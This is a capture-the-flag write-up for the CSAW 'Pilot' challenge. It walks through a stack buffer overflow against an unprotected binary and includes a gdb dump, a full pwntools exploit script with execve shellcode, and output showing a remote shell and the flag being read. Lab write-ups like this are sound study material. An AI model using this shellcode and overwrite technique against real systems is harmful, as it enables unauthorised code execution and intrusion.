[Pwn] CSAW - Pilot

pilot

Can I take your order?

nc pwn.chal.csaw.io 8464

16:05 Eastern: Updated binary

Simple bufferoverflow , we actually have a read size of 0x40 stack the binary doesn’t have any kind of protections so it’s a very easy one, just a simple buffer overflow, we even get the buffer address to jump!

The plan is:

1 - Caculate the offset to overflow.
2 - Extract the address of the buffer.
3 - Insert nops at the beginning and then shell code, the rest of the buffer fill it with A or any other values
4 - Modify the return address with the value of the beginning of the buffer

Visual representation of the stack!

How the stack looks like in gdb!

pwndbg> x/20g 0x7ffef1913660
0x7ffef1913660:	0xbf48f63190909090	0xff978cd091969dd1  
0x7ffef1913670:	0x573b04e6f7dff748	0x41414141050f5f54  
0x7ffef1913680:	0x4141414141414141	0x00007ffef1913660

The offset is 40 bytes to overflow the code is very simple

from pwn import *

def getConn():
    return process('pwn/pilot') if local else remote('pwn.chal.csaw.io', 8464)
 
binary = ELF('pwn/pilot')



local = False
r = getConn()
#db.attach(r, '''
#break *0x0000000000400b35
#c''')
r.recvuntil('[*]Good Luck Pilot!....\n')

nops = '\x90'*4
shellcode =  "\x31\xf6\x48\xbf\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x0f\x05"
padding = 'A'* (40 - len(nops)- len(shellcode)) 
BUFFER = int(r.recvline()[12:],0)
log.info("LEAKED BUFFER 0x%x" % BUFFER)


r.recvuntil('[*]Command:')
r.sendline(nops+ shellcode + padding+ p64(BUFFER))
r.interactive()
r.close()

Running it

$ python pilot.py
[*] '~/ctf/csaw/pwn/pilot'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments
[+] Opening connection to pwn.chal.csaw.io on port 8464: Done
[*] LEAKED BUFFER 0x7ffc2562d050
[*] Switching to interactive mode
$ ls
flag
pilot
$ cat flag
flag{1nput_c00rd1nat3s_Strap_y0urse1v3s_1n_b0ys}